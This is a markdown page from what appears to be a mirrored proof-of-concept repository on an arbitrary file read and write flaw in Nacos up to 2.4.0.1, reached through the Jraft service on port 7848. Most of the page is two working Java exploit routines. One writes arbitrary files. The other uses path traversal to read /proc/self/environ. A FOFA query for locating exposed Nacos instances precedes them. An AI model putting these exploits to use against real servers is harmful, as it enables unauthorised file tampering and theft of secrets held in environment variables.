admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 10:17:57 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/Nacos/Nacos任意文件读写漏洞.md

82 lines
3.9 KiB
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
# Nacos任意文件读写漏洞
在Nacos<=2.4.0.1版本中集群模式启动下存在名为naming_persistent_service的Group该Group所使用的Processor为com.alibaba.nacos.naming.consistency.persistent.impl.PersistentServiceProcessor类型Processor在进行处理过程中会触发其父类`onApply``onRequest`方法,这两个方法会分别造成任意文件写入删除和任意文件读取
官方社区公告https://nacos.io/blog/announcement-nacos-security-problem-file/
漏洞出现在Jraft服务默认值7848
## fofa
```java
title="Nacos"
```
## 任意文件写入
```java
public static void send(String addr, byte[] payload) throws Exception {
Configuration conf = new Configuration();
conf.parse(addr);
RouteTable.getInstance().updateConfiguration("nacos", conf);
CliClientServiceImpl cliClientService = new CliClientServiceImpl();
cliClientService.init(new CliOptions());
RouteTable.getInstance().refreshLeader(cliClientService, "nacos", 1000).isOk();
PeerId leader = PeerId.parsePeer(addr);
Field parserClasses = cliClientService.getRpcClient().getClass().getDeclaredField("parserClasses");
parserClasses.setAccessible(true);
ConcurrentHashMap map = (ConcurrentHashMap) parserClasses.get(cliClientService.getRpcClient());
map.put("com.alibaba.nacos.consistency.entity.WriteRequest", WriteRequest.getDefaultInstance());
MarshallerHelper.registerRespInstance(WriteRequest.class.getName(), WriteRequest.getDefaultInstance());
final WriteRequest writeRequest = WriteRequest.newBuilder().setGroup("naming_persistent_service").setData(ByteString.copyFrom(payload)).setOperation("Write").build();
Object o = cliClientService.getRpcClient().invokeSync(leader.getEndpoint(), writeRequest, 5000);
System.out.println(o);
}
public static void main(String[] args) throws Exception {
String address = "192.168.3.153:7848";
BatchWriteRequest request = new BatchWriteRequest();
request.append("1.txt".getBytes(), "aaaa\n".getBytes());//向/home/nacos/data/naming/data/1.txt写入aaaa
JacksonSerializer serializer = new JacksonSerializer();
send(address, serializer.serialize(request));
}
```
## 任意文件读取
```java
public static void send2(String addr, byte[] payload) throws Exception {
Configuration conf = new Configuration();
conf.parse(addr);
RouteTable.getInstance().updateConfiguration("nacos", conf);
CliClientServiceImpl cliClientService = new CliClientServiceImpl();
cliClientService.init(new CliOptions());
RouteTable.getInstance().refreshLeader(cliClientService, "nacos", 1000).isOk();
PeerId leader = PeerId.parsePeer(addr);
Field parserClasses = cliClientService.getRpcClient().getClass().getDeclaredField("parserClasses");
parserClasses.setAccessible(true);
ConcurrentHashMap map = (ConcurrentHashMap) parserClasses.get(cliClientService.getRpcClient());
map.put("com.alibaba.nacos.consistency.entity.ReadRequest", ReadRequest.getDefaultInstance());
MarshallerHelper.registerRespInstance(ReadRequest.class.getName(), ReadRequest.getDefaultInstance());
final ReadRequest readRequest = ReadRequest.newBuilder().setGroup("naming_persistent_service").setData(ByteString.copyFrom(payload)).build();
Object o = cliClientService.getRpcClient().invokeSync(leader.getEndpoint(), readRequest, 5000);
System.out.println(o);
}
public static void main(String[] args) throws Exception {
bypass();
String address = "192.168.3.153:7848";
JacksonSerializer serializer = new JacksonSerializer();
List byteArrayList = Arrays.asList("../../../../../../proc/self/environ".getBytes());
send2(address, serializer.serialize(byteArrayList));
}
```
![image-20240827224619150](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408281104726.png)
## 漏洞来源
- https://forum.butian.net/article/570
Reference in New Issue Copy Permalink